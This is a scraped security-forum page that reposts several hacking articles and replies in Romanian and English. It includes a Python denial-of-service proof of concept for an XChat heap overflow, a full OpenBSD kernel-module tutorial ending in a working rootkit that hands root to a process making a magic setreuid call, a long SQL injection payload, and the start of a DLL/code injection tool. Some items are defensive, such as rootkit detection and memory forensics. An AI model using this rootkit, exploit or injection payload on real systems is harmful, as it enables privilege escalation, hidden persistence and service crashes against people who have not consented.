Nytro

XChat Heap Overflow DoS Proof of Concept Screenshot: http://www.exploit-db.com/wp-content/themes/exploit/screenshots/bt5r1-2011-11-25-22-30-13.png #!/usr/bin/python # Exploit Title: XChat Heap Overflow DoS Proof of Concept # Date: June 2011 # Author: th3p4tri0t # Software Link: http://xchat.org/ # Version: <= 2.8.9 # This only works on XChat on KDE, I'm not sure about windows. # It has been tested on Ubuntu (failed), Kubuntu, and Bactrack 5 # It is a heap overflow and is some sort of error with X Windows # It uses 1537 (this is the minimum) of the ascii value 20 # after this, an unknown number of any other character (did not check for special # characters) is required to trigger a crash, presumably the payload will go here. # th3p4tri0t import socket print "XChat PoC Exploit by th3p4tri0t\n" print "Creating server..." sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print " [*] Binding to socket..." sock.bind(('127.0.0.1', 6667)) print " [*] Listening on socket..." sock.listen(5) print " [*] Accepting connection..." (target, address) = sock.accept() print " [*] Sending payload..." buffer = "hybrid7.debian.local " buffer += chr(20) * 1537 # minimum required of this character buffer += "A"*4000 # anything can go here and it still works. buffer += " \r\n" target.send(buffer) target.close sock.close Sursa: XChat Heap Overflow DoS

Linux Mint 12 "Lisa" released! Written by Clem on Saturday, November 26th, 2011 The team is proud to announce the release of Linux Mint 12 “Lisa”. New features at a glance: Gnome 3 and MGSE MATE Artwork improvements Search engines For a complete overview and to see screenshots of the new features, visit: “What’s new in Linux Mint 12“. Important info and release notes: The Release Notes are an important source of information. Here are some of the topics they cover: Tips and Tricks Information about DuckDuckGo Switch to a single top panel Switch to a black panel, menu and window list Quickly preview files without opening them Restart Gnome Shell when needed Debug Gnome Shell (for developers or to troubleshoot) Run Gnome Shell in Virtualbox (for testers and reviewers) Install MATE from the CD edition Workaround for a disappearing MATE panel Workaround for 100% CPU usage in MATE MATE mint4win Moonlight Upstream issues System requirements: x86 processor (Linux Mint 64-bit requires a 64-bit processor. Linux Mint 32-bit works on both 32-bit and 64-bit processors). 512 MB RAM (1GB recommended for a comfortable usage). 5 GB of disk space Graphics card capable of 800x600 resolution CD/DVD drive or USB port Upgrade instructions: To upgrade from a previous version of Linux Mint follow these instructions. To upgrade from Linux Mint 12 RC, simply apply any level 1 and 2 updates (if any), as well as level 3 “mate” and “caja” updates available in the Update Manager. Download: http://torrents.linuxmint.com/torrents/linuxmint-12-gnome-dvd-32bit.iso.torrent Sursa si alte metode de download: http://blog.linuxmint.com/?p=1889

Syscall Hijacking: OpenBSD November 26, 2011, styx^ Hi, in this post I show you how to hijack the system calls in the latest OpenBSD kernel versions. The way in which syscalls can be hijacked in OpenBSD kernel is very similar to that used in the Linux kernel 2.4 versions. The syscall table is exported and it is accessible by an external kernel module. So a syscall address can be overwritten by the address of an our function. - An example of OpenBSD LKM Fist of all, an example of OpenBDS LKM (“LKM_test.c”) follows: #include <sys/param.h> #include <sys/systm.h> #include <sys/ioctl.h> #include <sys/cdefs.h> #include <sys/conf.h> #include <sys/exec.h> #include <sys/lkm.h> #include <sys/proc.h> #include <sys/kernel.h> MOD_MISC("LKM_test"); int LKM_test_lkmentry(struct lkm_table *, int, int); int LKM_test_lkmload(struct lkm_table *, int); int LKM_test_lkmunload(struct lkm_table *, int); int LKM_test_lkmstat(struct lkm_table *, int); int LKM_test_lkmload(struct lkm_table *lkmt, int cmd) { printf("Hello!\n"); return 0; } int LKM_test_lkmunload(struct lkm_table *lkmt, int cmd) { printf("Goodbye\n"); return 0; } int LKM_test_lkmstat(struct lkm_table *lkmt, int cmd) { printf("Here I am!\n"); return 0; } int LKM_test_lkmentry(struct lkm_table *lkmt, int cmd, int ver) { DISPATCH(lkmt, cmd, ver, LKM_test_lkmload, LKM_test_lkmunload, LKM_test_lkmstat); } The behavior of this module is very simple: the LKM_test_lkmentry() function is the entry point function of the kernel module and it’s the first function invoked when the module is loaded in memory. In this function the DISPATCH() macro is called: this macro is defined in “sys/lkm.h”: ... #define DISPATCH(lkmtp,cmd,ver,load,unload,stat) do { if (ver != LKM_VERSION) return EINVAL; switch (cmd) { int error; case LKM_E_LOAD: lkmtp->private.lkm_any = (struct lkm_any *)&_module; if ((error = load(lkmtp, cmd)) != 0) return error; break; case LKM_E_UNLOAD: if ((error = unload(lkmtp, cmd)) != 0) return error; break; case LKM_E_STAT: if ((error = stat(lkmtp, cmd)) != 0) return error; break; } return lkmdispatch(lkmtp, cmd); } while (/* CONSTCOND */ 0) ... The DISPATCH macro handles the loading (by the fourth argument), unloading (by the fifth argument) and querying (by the sixth argument) of the module. The module can be compiled running the “cc” command: # cc -D_KERNEL -I/sys -c LKM_test.c The module can be loaded, unloaded and queried via “modload”, “modunload” and “modstat” commands: # modload LKM_test.o Module loaded as ID 0 # # modstat -n LKM_test Type Id Off Loadaddr Size Info Rev Module Name MISC 0 0 d44ef000 0001 d44ef12c 2 LKM_test # # modunload -n LKM_test # # tail /var/log/messages ... Oct 20 22:02:20 spaccio /bsd Hello! Oct 20 22:02:20 spaccio /bsd DDB symbols added: 365344 bytes Oct 20 22:03:47 spaccio /bsd Here I am! Oct 20 22:04:20 spaccio /bsd Goodbye! - System call in OpenBSD The definition of the internal lkm structure for a syscall it’s defined in “sys/lkm.h” and it follows: struct lkm_syscall { MODTYPE lkm_type; int lkm_ver; char *lkm_name; u_long lkm_offset; /* save/assign area */ struct sysent *lkm_sysent; struct sysent lkm_oldent; /* save area for unload */ }; The fields of this structure represent the type of module, the lkm version, the name of the module, the offset at which to place the system call inside the syscall table. Moreover it’s present a pointer to a “sysent” structure. This structure is defined in “sys/systm.h”: extern struct sysent { /* system call table */ short sy_narg /* number of args */ short sy_argsize; /* total size of arguments */ int sy_flags; sy_call_t *sy_call; /* implementing function */ } sysent[]; The “sysent” array is the syscall table and it’s exported… ;-) The “lkm_syscall” struct will be initialised using the MOD_SYSCALL macro (defined in “sys/lkm.h”): #define MOD_SYSCALL(name,callslot,sysentp) static struct lkm_syscall _module = { LM_SYSCALL, LKM_VERSION, name, callslot, sysentp }; - System calls Hijacking We have now all the informations we need to hijack a system call. The method I’ll show is similar to that used for hooking the syscalls in kernel 2.4 versions. As I said before, the “sysent” array is like the old “syscall_table” exported in Linux kernel 2.4. So, what we have to do is overwriting the syscall address of the interested syscall with that of our function inside the “sysent” array. Each syscall has an unique id-number defined in “sys/syscall.h” that represents also its position inside the system call table. If we want to hijack the (i.e.) “mkdir()” syscall, we have only to search the “mkdir” id-number inside in this header file: ... /* syscall: "sendto" ret: "ssize_t" args: "int" "const void *" "size_t" "int" "const struct sockaddr *" "socklen_t" */ #define SYS_sendto 133 /* syscall: "shutdown" ret: "int" args: "int" "int" */ #define SYS_shutdown 134 /* syscall: "socketpair" ret: "int" args: "int" "int" "int" "int *" */ #define SYS_socketpair 135 /* syscall: "mkdir" ret: "int" args: "const char *" "mode_t" */ #define SYS_mkdir 136 /* syscall: "rmdir" ret: "int" args: "const char *" */ #define SYS_rmdir 137 /* syscall: "utimes" ret: "int" args: "const char *" "const struct timeval *" */ #define SYS_utimes 138 ... The “mkdir” id-number is the number 136. The values contained inside the “sysent” structure are defined in the “init_sysent.c” file: struct sysent sysent[] = { ... { 2, s(struct sys_mkdir_args), 0, 352 sys_mkdir }, ... According to the prototype of the “sysent” structure, the first field represents the number of arguments. The second arguments is the size of the “sys_mkdir_args” structure, that is the structure in which the “mkdir” arguments are defined. All the syscalls’ arguments are defined inside the “sys/syscallargs.h” file: ... struct sys_mkdir_args { syscallarg(const char *) path; syscallarg(mode_t) mode; }; ... The “mkdir” syscall accepts two arguments: the directory path and mode. The fourth argument of the “sysent” structure is a pointer to the implementing function “sys_mkdir()”. We can find the “sys_mkdir()” prototype inside the same file: int sys_mkdir(struct proc *, void *, register_t *); All the syscall functions take as arguments these three fields: - a “struct proc” pointer: The structure that contains the informations about the process that it’s invoking the syscall. - a “void” pointer to the syscall’s arguments. - a “register_t” (it’s a simple integer) pointer to the syscall return value. Now we have all the necessary informations we need to hijack the “mkdir” syscall. The “hijack.c” source code follows: #include <sys/param.h> #include <sys/systm.h> #include <sys/ioctl.h> #include <sys/cdefs.h> #include <sys/conf.h> #include <sys/mount.h> #include <sys/exec.h> #include <sys/lkm.h> #include <sys/proc.h> #include <sys/kernel.h> #include <sys/syscallargs.h> #include <sys/syscall.h> MOD_MISC("hijack"); int hijack_lkmentry(struct lkm_table *, int, int); int hijack_lkmload(struct lkm_table *, int); int hijack_lkmunload(struct lkm_table *, int); int hijack_lkmstat(struct lkm_table *, int); int (*mkdir_old)(struct proc *td, void *args, register_t *; int mkdir_new(struct proc *td, void *args, register_t * { struct sys_mkdir_args /* { syscallarg(const char *) path; syscallarg(mode_t) mode; } */ *uap = args; printf("Mkdir hijacked -> %s %x\n", uap->path, uap->mode); return (mkdir_old(td, args, ); } int hijack_lkmload(struct lkm_table *lkmt, int cmd) { mkdir_old = sysent[SYS_mkdir].sy_call; sysent[SYS_mkdir].sy_call = (sy_call_t *) mkdir_new; printf("Hello!\n"); return 0; } int hijack_lkmunload(struct lkm_table *lkmt, int cmd) { sysent[SYS_mkdir].sy_call = (sy_call_t *) mkdir_old; printf("Goodbye\n"); return 0; } int hijack_lkmstat(struct lkm_table *lkmt, int cmd) { printf("Here I am!\n"); return 0; } int hijack_lkmentry(struct lkm_table *lkmt, int cmd, int ver) { DISPATCH(lkmt, cmd, ver, hijack_lkmload, hijack_lkmunload, hijack_lkmstat); } We can compile (and load) this module and we can create a new “test” directory to check if the module works properly: # cc -D_KERNEL -I/sys -c hijack.c # modload hijack.o Module loaded as ID 0 # mkdir test # ls ./ test # tail /var/log/messages ... Oct 20 22:15:38 spaccio /bsd Hello! Oct 20 22:15:38 spaccio /bsd DDB symbols added: 365344 bytes Oct 20 22:16:10 spaccio /bsd Mkdir hijacked -> test 1ed Perfect! The directory has been created and the syscall has been hijacked as expected. Now we can write a more interesting kernel module. - A very simple rootkit Now I’ll show you how to change the process credentials through kernel modules. I use the same method shown in this post. Our rootkit will give us root credentials when we invoke a new shell with RUID == 3410 && EUID == 0143. We only need to hijack the “setreuid” syscall and to check the ruid and euid correctness. As I wrote before, the first argument of each syscall function is a “struct proc” pointer that contains the informations about the process that it’s calling the syscall. So, we only need to change the credentials’ values stored in this structure. This structure is defined in “sys/proc.h”: struct process { struct proc *ps_mainproc; struct pcred *ps_cred; /* Process owner's identity. */ struct plimit *ps_limit; /* Process limits. */ TAILQ_HEAD(,proc) ps_threads; /* Threads in this process. */ int ps_refcnt; /* Number of references. */ }; We are interested on the “pcred” structure. This structure contains all the informations about the process owner’s credentials. This struct is defined in the same file: struct pcred { struct ucred *pc_ucred; /* Current credentials. */ uid_t p_ruid; /* Real user id. */ uid_t p_svuid; /* Saved effective user id. */ gid_t p_rgid; /* Real group id. */ gid_t p_svgid; /* Saved effective group id. */ int p_refcnt; /* Number of references. */ }; The “ucred” structure is defined in the “sys/ucred.h” file: struct ucred { u_int cr_ref; /* reference count */ uid_t cr_uid; /* effective user id */ gid_t cr_gid; /* effective group id */ short cr_ngroups; /* number of groups */ gid_t cr_groups[NGROUPS]; /* groups */ }; We have to hijack the “setreuid” syscall and change these values. The rootkit kernel module (“rootkit.c”) follows: #include <sys/param.h> #include <sys/systm.h> #include <sys/ioctl.h> #include <sys/cdefs.h> #include <sys/conf.h> #include <sys/mount.h> #include <sys/exec.h> #include <sys/lkm.h> #include <sys/proc.h> #include <sys/kernel.h> #include <sys/syscallargs.h> #include <sys/syscall.h> MOD_MISC("rootkit"); int rootkit_lkmentry(struct lkm_table *, int, int); int rootkit_lkmload(struct lkm_table *, int); int rootkit_lkmunload(struct lkm_table *, int); int rootkit_lkmstat(struct lkm_table *, int); int (*setreuid_old)(struct proc *td, void *args, register_t *; int setreuid_new(struct proc *td, void *args, register_t * { struct sys_setreuid_args /* { syscallarg(uid_t) ruid; syscallarg(uid_t) euid; }*/ *uap = args; uid_t uid; uid_t ruid, euid; ruid = SCARG(uap, ruid); euid = SCARG(uap, euid); if ((ruid == 3410) && (euid == 0143)) { td->p_cred->p_ruid = 0; td->p_cred->p_svuid = 0; td->p_cred->p_rgid = 0; td->p_cred->p_svgid = 0; td->p_cred->pc_ucred->cr_uid = 0; td->p_cred->pc_ucred->cr_gid = 0; ruid = 0; euid = 0; SCARG(uap, ruid) = ruid; SCARG(uap, euid) = euid; } return (setreuid_old(td, args, ); } int rootkit_lkmload(struct lkm_table *lkmt, int cmd) { setreuid_old = sysent[SYS_setreuid].sy_call; sysent[SYS_setreuid].sy_call = (sy_call_t *) setreuid_new; printf("Hello!\n"); return 0; } int rootkit_lkmunload(struct lkm_table *lkmt, int cmd) { sysent[SYS_setreuid].sy_call = (sy_call_t *) setreuid_old; printf("Goodbye\n"); return 0; } int rootkit_lkmstat(struct lkm_table *lkmt, int cmd) { printf("Here I am!\n"); return 0; } int rootkit_lkmentry(struct lkm_table *lkmt, int cmd, int ver) { DISPATCH(lkmt, cmd, ver, rootkit_lkmload, rootkit_lkmunload, rootkit_lkmstat); } We can use the following script (“test.c”) to test the rootkit: #include <stdio.h> int main () { setreuid (3410, 0143); system ("/bin/sh"); return 0; } Now we can compile and then load the kernel module: # cc -D_KERNEL -I/sys -c rootkit.c # modload rootkit.o Module loaded as ID 0 Now, we can change user and we can test if the kernel module works properly: # su - spaccio $ ./test # whoami root # exit $ Great, it works! Bye. Sursa: http://memset.wordpress.com/2011/11/26/syscall-hijacking-openbsd/

iOS application security - CCCamp 2011 Uploaded by CCCen on Nov 25, 2011 iOS application security A look at the security of 3rd party iOS applications Over the last few years there has been a signifant amount of iPhone and iPad application development going on. Although based on Mac OSX, its development APIs are new and very specific to the iPhone and iPad. In this presentation, Ilja van Sprundel, Principal Security Consultant at IOActive, will discuss lessons learned from auditing iPhone and iPad applications over the last year. It will cover the use of specific APIs, why some of them aren't granular enough, and why they might expose way too much attack surface. The talk will cover ssl, xml, url handling, UIWebViews and more. Furthermore, it will also cover what apps are allowed to do when inside their sandbox once an application has been hacked. Speaker: Ilja van Sprundel EventID: 4490 Event: Chaos Communication Camp 2011 (CCCamp 2011) of the Chaos Computer Club [CCC] Language: english Start: 11.08.2011 21:00:00 +02:00 License: CC-by-nc-sa Video: http://www.youtube.com/watch?v=Gq3lSw9sTv4&feature=related

Sql Injection In Bt5 R1 With Sqlmap.Py Nu vreau sa incurajez script kidding-ul, dar uneori e necesar un dump la o baza de date sau pur si simplu obtinerea rapida a unor informatii. Sqlmap e o unealta foarte puternica, profesionala si foarte usor de folosit. Aveti aici un videoclip care demonstreaza simplitudinea folosirii sale: http://www.securitytube.net/video/2489 http://vimeo.com/32571098 Un exemplu mai usor de inteles e folosirea Havij-ului, un utilitar cu interfata grafica: http://www.youtube.com/watch?v=JdgE7MSsBTc Deci acesta NU este hacking. Daca folositi asa ceva nu inseamna ca stiti SQL Injection. Daca executati 3 comenzi nu deveniti hackeri. SQL Injection, pana la urma, e o arta, iar cei care folosesc astfel de unelte pentru a se lauda prietenilor ca cine stie ce au realizat, cand ei nu stiu ce face practic UNION sau ce e un JOIN in MySQL, sunt ceea ce numim "script-kiddie", practic copii fara viitor. Cu asta vreau sa demonstrez si celor care nu se ocupa cu astfel de "prostii", cat de usor se poate "obtine acces" la o baza de date. Vreau sa inteleaga tot poporul ca SQL Injection nu mai este de foarte mult timp ceva ce stiu "hackerii" si ca in ziua de azi nu e nevoie sa cunosti nimic despre aceasta tehnica pentru a o putea exploata. Vreau sa se inteleaga faptul ca sunt foarte putine persoane care STIU SQL Injection si ca sunt extrem de multi pusti entuziasmati care folosesc astfel de unelte pentru a se lauda amicilor ca ei sunt "hackeri". SQL Injection nu e deloc simplu, nu e nici de departe acel "UNION SELECT 1,3,3,7,version()--" pe care il stie toata lumea, sunt lucruri extrem de complicate si ingenioase pe care le stiu putin persoane, in general persoane care stiu cum functioneaza un sistem de gestiune a bazelor de date relationale (MySQL) si persoane care se lupta ore in sir pentru a trece de anumite filtre de securitate, de scriu query-uri de obosesti citindu-le, de folosesc operatori si functii MySQL care nici nu te gandeai ca exista intr-un mod genial... Ca sa va faceti o idee exista query-uri ca: '+and+(select+@d:=(SELECT+COUNT(schema_name)+from+information_schema.schemata)v)=(SELECT+@dbs:=concat(@i:=0x00,@o:=0xd0a,benchmark(@d,@o:=CONCAT(@o,0xd0a,(SELECT+concat(0x3c62723e,@i:=schema_name)+FROM+information_schema.schemata+WHERE+schema_name>@i+order+by+schema_name+LIMIT+1))),@o))+UNION+ALL+SELECT+@dbs,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--+-- Si sunt tone de lucruri pe care multi nici nu viseaza ca le vor cunoaste. Cati dintre voi, cei care pretind ca "stiu" SQL Injection, inteleg acest query? Cati dintre voi nu pretindeti ca stiti SQL Injection doar pentru ca "stiti" chestia cu UNION? Cati dintre voi stiti care e diferenta dintre UNION SELECT 1,2,3 si UNION SELECT 1,2,3 FROM tabel? Cati dintre voi stiti ce face acel "ALL" pe care multi il folositi? In concluzie, un singur lucru vreau sa intelegeti: SQL Injection ("definit" mai sus, de mine) NU DEFINESTE un hacker. Spun asta pentru ca in ziua de azi la aceasta concluzie trista si penibila s-a ajuns.

Tedx Brussels - Miko H. Hypponen - Defending The Net Miko H. Hypponen - Defending The Net O prezentare interesanta care pune mai multe probleme: - imprimantele de la marii producatori, produc anumite tipare de pete galbene, unice, care pot identifica imprimanta folosita - care sunt tipurile de atacatori online - problema firmei DigiNotar cu certificatele digitale si la ce consecinte a dus - cum guvernul german a creat un Trojan pentru monitorizarea cetatenilor - cum guvernele din Vest ofera software pentru monitorizare tarilor din Orientul mijlociu Va recomand sa urmariti http://www.securitytube.net/video/2517 http://www.youtube.com/watch?v=rjeQKAaTlNs

Da, bun venit printre noi.

Web Application Analysis Contents 1 Backdoors 2 CMS Scanners 3 Database Assessment 3.1 MS-SQL 3.2 MYSQL 3.3 Oracle 3.4 SQL Injection Frameworks 4 Fingerprinting 5 Fuzzers 6 Proxies 7 Scanners 8 Security Training Environments and Programs 9 Testing Frameworks 10 Web Browser Assessment 11 Web Browser Plugins Backdoors XSS Shell CMS Scanners CMS Explorer OWASP Joomla Vulnerability Scanner Plecost-wordpress-fingerprinter WPScan Database Assessment MS-SQL DBPwAudit Metacoretex Mssqlfp MSSQLScan multiinjector Pblind SA Exploiter SQLbrute SQLiX SQLMap SQL Ninja MYSQL DBPwAudit Metacoretex MYSQLAudit MySploit Pblind SQLCheck SQLData SQLiX SQLMap Sqlsus UDF Oracle DBPwAudit Metacoretex Opquery Opwg Oscanner Ose Otnsctl Pblind SQLbrute SQLiX SQLMap SQL Injection Frameworks BSQL Hacker Fingerprinting Wafp Fuzzers FuzzDb OWASP ZAP PowerFuzzer Wfuzz Proxies Burpsuite Fiddler OWASP ZAP Paros Proxy ProxyStrike Ratproxy Webscarab Scanners CSRFTester Curl DFF Scanner DirBuster Grabber Grendel Scan Httprint Jmeter Lbd List Urls Mini Mysqlat0r Netsparker Community Edition Nikto OpenAcunetix OWASP ZAP SecuBat Skipfish SoapUI Swfintruder W3AF Wapiti WebRaider Webshag WMAT x5s Xsss Yokoso! Security Training Environments and Programs DVWA Jarlsberg Web Security Dojo Testing Frameworks Bizploit Sahi Websecurify Web Browser Assessment Beef Browser Fuzzer 3 (bf3) Browser Rider Web Browser Plugins Groundspeed X06D Sursa: Web Application Analysis - Security and Hacking Tools

Security researcher demonstrates Windows 8 bootkit By Tom Warren, on 25th Nov 11 2:47 pm Security researcher Peter Kleissner has created a Windows 8 bootkit that bypasses User Account Control (UAC). The bootkit, just 14KB in size, is believe to be the first proof-of-concept exploit code for Windows 8. The attack works on the current Windows 8 developer preview and allows a command prompt to run under the SYSTEM account after exploitation. User Account Control (UAC) is defeated as the technology does not prompt the end user. ZDNet reports that Kleissner has previously developed a proof-of-concept ‘bootkit’ called Stoned. His latest attempt at Windows 8 appears to follow in similar footsteps. It’s not clear from the video whether Kleissner has managed to port any of the Stoned Bootkit features to Windows 8. Microsoft has previously detailed its security improvements with Windows 8. Windows 8 will include an array of security features to better protect end users against a variety of online threats. Microsoft is beefing up its Windows Defender solution to include improved protection for a range of malware. Microsoft will deliver the same set of malware signatures via Windows Update. Defender will now include real-time detection and protection from malware using a file system filter. Defender will also interface with Microsoft’s secure boot technology in Windows 8. Windows PCs with UEFI-based secure boot will be able to take advantage of Microsoft’s Windows security to ensure firmware and firmware updates all remain secure. Microsoft is able to achieve this by loading only properly signed and validated code during boot. Microsoft has also improved its SmartScreen filtering for Windows 8 and Internet Explorer. Microsoft has extended its browser technology to Windows as a whole. Windows 8 will now protect end users by checking applications and URLs against reputation-based database. The technology appears to be working on existing solutions. Microsoft is also working with other security vendors to ensure their apps are also improved with Windows 8. Video: http://vimeo.com/32666961 Sursa: http://www.winrumors.com/security-researcher-demonstrates-windows-8-bootkit-video/

Mi-au cerut 2 persoane asa ceva si l-am uploadat: http://www.speedyshare.com/file/5g2fF/Selenity-CMS-v0.2.zip

Special pentru cei care au probleme cu DIICOT-ul: Liviu Guta - Stati mascatilor - YouTube

Quick Tip: Find Hidden Processes and Ports [ Linux / Unix / Windows ] by VIVEK GITE on NOVEMBER 24, 2011 Unhide is a little handy forensic tool to find hidden processes and TCP/UDP ports by rootkits / LKMs or by another hidden technique. This tools works under both Linux / Unix, and MS-Windows operating systems. From the man page: It detects hidden processes using three techniques: The proc technique consists of comparing /proc with the output of /bin/ps. The sys technique consists of comparing information gathered from /bin/ps with information gathered from system calls. The brute technique consists of bruteforcing the all process IDs. This technique is only available on Linux 2.6 kernels. Most rootkits use the power of the kernel to hide themselves, they are only visible from within the kernel. You can use unhide or tool such as rkhunter to scan for rootkits, backdoors and possible local exploits. How do I Install Unhide? It is recommended that you run this tool from read-only media. To install the same under Debian or Ubuntu Linux, enter: # apt-get install unhide Sample outputs: Reading package lists... Done Building dependency tree Reading state information... Done Suggested packages: rkhunter The following NEW packages will be installed: unhide 0 upgraded, 1 newly installed, 0 to remove and 6 not upgraded. Need to get 822 kB of archives. After this operation, 1,872 kB of additional disk space will be used. Get:1 http://ftp.us.debian.org/debian/ squeeze/main unhide amd64 20100201-1 [822 kB] Fetched 822 kB in 5s (162 kB/s) Selecting previously deselected package unhide. (Reading database ... 166644 files and directories currently installed.) Unpacking unhide (from .../unhide_20100201-1_amd64.deb) ... Processing triggers for man-db ... Setting up unhide (20100201-1) ... FreeBSD: Install unhide Type the following command to install the same using the port, enter: # cd /usr/ports/security/unhide/ # make install clean OR, you can install the same using the binary package, enter: # pkg_add -r unhide unhide-tcp is a forensic tool that identifies TCP/UDP ports that are listening but are not listed in /bin/netstat through brute forcing of all TCP/UDP ports available. How Do I Use This Tool? You can use it as follows: # unhide-posix proc # unhide-posix sys OR # unhide-linux26 proc # unhide-linux26 sys # unhide-linux26 brute Sample outputs: Unhide 20100201 http://www.security-projects.com/?Unhide [*]Searching for Hidden processes through kill(..,0) scanning [*]Searching for Hidden processes through comparison of results of system calls [*]Searching for Hidden processes through getpriority() scanning [*]Searching for Hidden processes through getpgid() scanning [*]Searching for Hidden processes through getsid() scanning [*]Searching for Hidden processes through sched_getaffinity() scanning [*]Searching for Hidden processes through sched_getparam() scanning [*]Searching for Hidden processes through sched_getscheduler() scanning [*]Searching for Hidden processes through sched_rr_get_interval() scanning [*]Searching for Hidden processes through sysinfo() scanning HIDDEN Processes Found: 1 (Fig.01: 1 hidden process found using the unhide-linux26 sys command) # unhide-tcp Sample outputs: Unhide 20100201 http://www.security-projects.com/?Unhide Starting TCP checking Starting UDP checking However, I found something interesting: # unhide-tcp Sample outputs: Unhide 20100201 http://www.security-projects.com/?Unhide Starting TCP checking Found Hidden port that not appears in netstat: 1048 Found Hidden port that not appears in netstat: 1049 Found Hidden port that not appears in netstat: 1050 Starting UDP checking The netstat -tulpn or ss commands displayed nothing about the hidden TCP ports # 1048, 1049, and 1050: # netstat -tulpn | grep 1048 # ss -lp # ss -l | grep 1048 See also: Unhide project. Sursa: Quick Tip: Find Hidden Processes and Ports [ Linux / Unix / Windows ]

Memory Forensics: Pull Process & Network Connections from a Memory Dump In the previous article, we learned how to pull passwords from a memory dump file. This time, we will cover viewing a process list and network connections out of captured memory files. Volatility’s “pslist” command can be used to view the processes that were running on a Windows system: volatility pslist -f memdumpfilename.raw –profile=Win7SP1x86 (Use double dashes in front of profile for some reason they are showing up as a single) From the output of the command, we see the physical memory location, process name and the PID number of all process that were running on the system. This helps deduce if something was running on the computer that should not have been and as you will see in a future article, allows you to view programs that may be running under the process. The next step is to view all network connections that were active from the memory dump: volatility netscan -f memdumpfilename.raw –profile=Win7SP1x86 (Use double dashes in front of profile) The data returned shows all network connections, including the process name, source and destination IP addresses – including ports. This is just a short snip of what was actually returned, the actual list is easily twice as long. This information helps the analyst see if there were any strange network connections active. Or can help the penetration tester gain valuable information about the network. The last command that we will look at this time is “bioskbd“. volatility bioskbd -f memdumpfilename.raw –profile=Win7SP1x86 (Use double dashes in front of profile) As you can see there is no data returned on this memory dump. But what does “bioskbd” actually do? This interesting command has the ability to pull passwords that are resident from the bios cache buffer. Though most newer systems (like the system that this memory dump was taken from) purge the bios keyboard buffer, many older ones did not. On an old system you might be able to retrieve BIOS boot passwords, or even the passwords for disk encryption systems. That’s it for this post, on the next Memory Forensics post, we will take a look at pulling malware samples off of a system infected with STUXNET! by D. Dieterle on November 8, 2011. Sursa: http://cyberarms.wordpress.com/2011/11/08/memory-forensics-pull-process-network-connections-from-memory-dump/

Toti cei care au avut o copilarie fericita au avut asa ceva. PS: Exista NES emulator si un site unde gasiti sute de jocuri ca Mario, Tank si multe altele. Cautati aici: Mario Bross, la Offtopic si cititi topicul.

Oricum, trashed, eu nu vad decat niste link-uri. Daca nu va obositi sa exploatati, nu va obositi nici sa postati.

Nu are rost. In cel mai rau caz o sa postez Selenity CMS, care e o versiune ceva mai "colorata". Dar e prost scris, nu e MVC si nu e scris OOP, cu clase, cum ar fi trebuit...

Eu zic sa va uitati la ultimele voastre topicuri si posturi si sa vedeti ce si cand ati postat ultima data in categoriile: Tutoriale engleza/video (ca la romana au inceput sa apara tutoriale de rahat) sau Programare. Uitati-va la ultimele voastre topicuri si posturi, prin ce categorii si cat de practice sunt, apoi invinuiti-i pe cei care inca nu au cont pentru ca nu se posteaza nimic util. Uitati-va la ultimele voastre topicuri si posturi, dati LogOut si obtineti VOI acordul unui membru de incredere (VIP de exemplu) de a activa pe raspunderea acestuia. Si ganditi-va la ce ati realizat in ultimul an. Nu faceti decat sa va bagati in toate discutiile, care de care mai penale, iar daca le inchidem sariti de cur in sus. Toti va plangeti ca e offtopic, dar daca primiti warn pentru asa ceva nu va convine. Va vaitati ca nu se posteaza nimic interesant dar nu va ganditi ca voi nu ati postat ceva interesant de ani. Si cel mai rau, ca acum, cand cititi acest post, nici de-ai dracu nu va simtiti VOI in aceasta situatie si considerati tot ca e vina "celorlalti", ca sunt multi "prosti". Daca vreti sa se schimbe ceva, incepeti prin a va schimba voi. Topic inchis!

Desigur, Abramburica... :

Nu ma intelege gresit, nu am nimic impotriva faptului ca vor sa isi faca un viitor. Sincer, si eu vreau sa isi faca un viitor, dar NU asa. In primul rand pentru ca asta nu e un viitor. Am cunoscut si cunosc persoane care se ocupa cu tot felul de prostii si am avut de mii de ori sansa sa ma implic in astfel de prostii, dar nu am facut-o din mai multe motive: 1. E vorba de bani, deci practic sunt multe legi impotriva lor, adica mari sanse sa ajuga la puscarie, deci ce fac ei nu e nici etic si nici legal 2. Ei nu stiu mare lucru despre calculatoare. Si nu zic ca sunt prosti, pentru ca nu sunt deloc, dar nu am intalnit nicio persoana care macar sa stie decent programare, pana si pagini de scam cu mail-ul ca <input type="hidden" /> am vazut, ceea ce NU e ok. 3. Nici macar limba engleza nu prea o cunosc, stiu ca mai ajutam eu anumite persoane cu traduceri in engleza Morala: "La munca, nu la intins mana"

Da, pe de-o parte fac ceva (foarte) putin util, pe de alta parte tot niste hoti sunt si aduc prejudicii morale Romaniei, iar Romania ca tara are multe de pierdut. Da, practic nu vad cate dovezi ar putea sa aduca, dar tot mai gasesc ei cate ceva. Eu pur si simplu i-as intreba: "Prietene, de unde ai avut 30.000 de euro pentru un BMW cand tac-tu castiga 1500 RON pe luna si tu esti somer?". Apoi le verifica harddiskurile, citesc si conversatiile pe messenger pentru ca sunt sigur ca gasesc ceva asa si in cel mai rau caz fac si "reverse route" a drumului banilor.

Daca tot sunteti de acord, inseama ca va putem bana conturile curente iar voi puteti face rost, voi stiti cum, de o "invitatie" pentru a va putea inregistra. Asa ar fi corect.

Harddisk-uri mai mult sau mai putin criptate, fisiere sterse ce se pot recupera, poate chiar conversatii pe messenger legate de rahaturile pe care le faceau.

Syringe - DLL & Code Injection Utility /* * * syringe.c v1.2 * * Author: Spencer McIntyre (Steiner) <smcintyre [at] securestate [dot] com> * * A General Purpose DLL & Code Injection Utility * * Copyright 2011 SecureState * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, * MA 02110-1301, USA. * */ #include <windows.h> #include <stdio.h> #include <tlhelp32.h> #define MAXLINE 512 #define CREATE_THREAD_ACCESS (PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ) #define REMOTE_ASSEMBLY_STUB_LENGTH_RELEASE 32 #define ATTACK_TYPE_DLL_INJECTION 1 #define 